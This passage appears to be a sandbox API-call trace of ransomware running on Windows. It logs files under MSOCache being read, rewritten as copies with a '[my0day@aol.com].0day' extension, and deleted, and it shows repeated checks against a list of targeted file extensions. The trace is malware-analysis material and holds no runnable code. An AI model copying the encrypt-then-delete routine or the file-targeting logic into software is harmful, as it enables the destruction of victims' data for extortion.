dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.738] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6241) returned 1 [0034.738] CloseHandle (hObject=0x1a4) returned 1 [0034.739] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.739] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.739] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.739] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.739] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.739] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0034.946] GetLastError () returned 0x0 [0034.946] ReadFile (in: hFile=0x1a4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1861, lpOverlapped=0x0) returned 1 [0035.086] WriteFile (in: hFile=0x1ac, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0035.663] ReadFile (in: hFile=0x1a4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.663] WriteFile (in: hFile=0x1ac, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.663] SetEndOfFile (hFile=0x1ac) returned 1 [0035.664] CloseHandle (hObject=0x1ac) returned 1 [0035.664] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.664] SetEndOfFile (hFile=0x1a4) returned 1 [0035.665] CloseHandle (hObject=0x1a4) returned 1 [0035.665] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.665] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".doc") returned 4 [0035.666] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".docx") returned 5 [0035.666] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.666] lstrlenW (lpString=".pdf") returned 4 [0035.666] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".xls") returned 4 [0035.666] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".xlsx") returned 5 [0035.666] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.666] lstrlenW (lpString=".ppt") returned 4 [0035.666] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".zip") returned 4 [0035.666] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.666] lstrlenW (lpString=".rar") returned 4 [0035.666] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".bz2") returned 4 [0035.666] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".7z") returned 3 [0035.666] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".dbf") returned 4 [0035.666] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".1cd") returned 4 [0035.666] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".jpg") returned 4 [0035.666] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.666] lstrlenW (lpString=".doc") returned 4 [0035.666] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".docx") returned 5 [0035.667] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.667] lstrlenW (lpString=".pdf") returned 4 [0035.667] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".xls") returned 4 [0035.667] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".xlsx") returned 5 [0035.667] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.667] lstrlenW (lpString=".ppt") returned 4 [0035.667] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.667] lstrlenW (lpString=".zip") returned 4 [0035.667] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.667] lstrlenW (lpString=".rar") returned 4 [0035.667] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".bz2") returned 4 [0035.667] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".7z") returned 3 [0035.667] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.667] lstrlenW (lpString=".dbf") returned 4 [0035.667] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.667] lstrlenW (lpString=".1cd") returned 4 [0035.667] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.667] lstrlenW (lpString=".jpg") returned 4 [0035.667] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.667] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.668] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0035.668] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.668] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=819) returned 1 [0035.668] CloseHandle (hObject=0x1a4) returned 1 [0035.668] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0035.668] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.668] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.668] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.668] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.668] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0035.669] GetLastError () returned 0x0 [0035.669] ReadFile (in: hFile=0x1a4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x333, lpOverlapped=0x0) returned 1 [0035.745] WriteFile (in: hFile=0x1ac, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x340, lpOverlapped=0x0) returned 1 [0035.746] ReadFile (in: hFile=0x1a4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.746] WriteFile (in: hFile=0x1ac, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0035.746] SetEndOfFile (hFile=0x1ac) returned 1 [0035.747] CloseHandle (hObject=0x1ac) returned 1 [0035.747] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.747] SetEndOfFile (hFile=0x1a4) returned 1 [0035.748] CloseHandle (hObject=0x1a4) returned 1 [0035.748] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.748] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0035.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".doc") returned 4 [0035.749] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString=".docx") returned 5 [0035.749] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.749] lstrlenW (lpString=".pdf") returned 4 [0035.749] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString=".xls") returned 4 [0035.749] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString=".xlsx") returned 5 [0035.749] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.749] lstrlenW (lpString=".ppt") returned 4 [0035.749] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".zip") returned 4 [0035.749] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.749] lstrlenW (lpString=".rar") returned 4 [0035.749] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString=".bz2") returned 4 [0035.749] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString=".7z") returned 3 [0035.749] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".dbf") returned 4 [0035.749] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".1cd") returned 4 [0035.749] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".jpg") returned 4 [0035.749] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.749] lstrlenW (lpString=".doc") returned 4 [0035.750] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString=".docx") returned 5 [0035.750] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.750] lstrlenW (lpString=".pdf") returned 4 [0035.750] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString=".xls") returned 4 [0035.750] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString=".xlsx") returned 5 [0035.750] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.750] lstrlenW (lpString=".ppt") returned 4 [0035.750] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.750] lstrlenW (lpString=".zip") returned 4 [0035.750] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.750] lstrlenW (lpString=".rar") returned 4 [0035.750] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString=".bz2") returned 4 [0035.750] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString=".7z") returned 3 [0035.750] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.750] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.750] lstrlenW (lpString=".dbf") returned 4 [0035.750] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.750] lstrlenW (lpString=".1cd") returned 4 [0035.750] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.750] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.750] lstrlenW (lpString=".jpg") returned 4 [0035.750] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.750] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.751] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.751] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.764] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=4274) returned 1 [0035.764] CloseHandle (hObject=0x1a0) returned 1 [0035.764] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.764] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.764] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.764] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.764] GetLastError () returned 0x0 [0035.764] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.766] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.767] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.767] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.767] SetEndOfFile (hFile=0x1b8) returned 1 [0035.767] CloseHandle (hObject=0x1b8) returned 1 [0035.768] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.768] SetEndOfFile (hFile=0x1a0) returned 1 [0035.768] CloseHandle (hObject=0x1a0) returned 1 [0035.768] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.769] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.769] lstrlenW (lpString=".doc") returned 4 [0035.769] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.769] lstrlenW (lpString=".docx") returned 5 [0035.769] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.769] lstrlenW (lpString=".pdf") returned 4 [0035.769] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.769] lstrlenW (lpString=".xls") returned 4 [0035.769] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.769] lstrlenW (lpString=".xlsx") returned 5 [0035.769] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.770] lstrlenW (lpString=".ppt") returned 4 [0035.770] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString=".zip") returned 4 [0035.770] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.770] lstrlenW (lpString=".rar") returned 4 [0035.770] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString=".bz2") returned 4 [0035.770] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString=".7z") returned 3 [0035.770] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString=".dbf") returned 4 [0035.770] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString=".1cd") returned 4 [0035.770] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString=".jpg") returned 4 [0035.770] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.770] lstrlenW (lpString=".doc") returned 4 [0035.770] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString=".docx") returned 5 [0035.770] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.770] lstrlenW (lpString=".pdf") returned 4 [0035.770] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString=".xls") returned 4 [0035.770] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.770] lstrlenW (lpString=".xlsx") returned 5 [0035.770] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.770] lstrlenW (lpString=".ppt") returned 4 [0035.770] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.771] lstrlenW (lpString=".zip") returned 4 [0035.771] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.771] lstrlenW (lpString=".rar") returned 4 [0035.771] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.771] lstrlenW (lpString=".bz2") returned 4 [0035.771] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.771] lstrlenW (lpString=".7z") returned 3 [0035.771] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.771] lstrlenW (lpString=".dbf") returned 4 [0035.771] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.771] lstrlenW (lpString=".1cd") returned 4 [0035.771] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.771] lstrlenW (lpString=".jpg") returned 4 [0035.771] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.771] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.771] lstrlenW 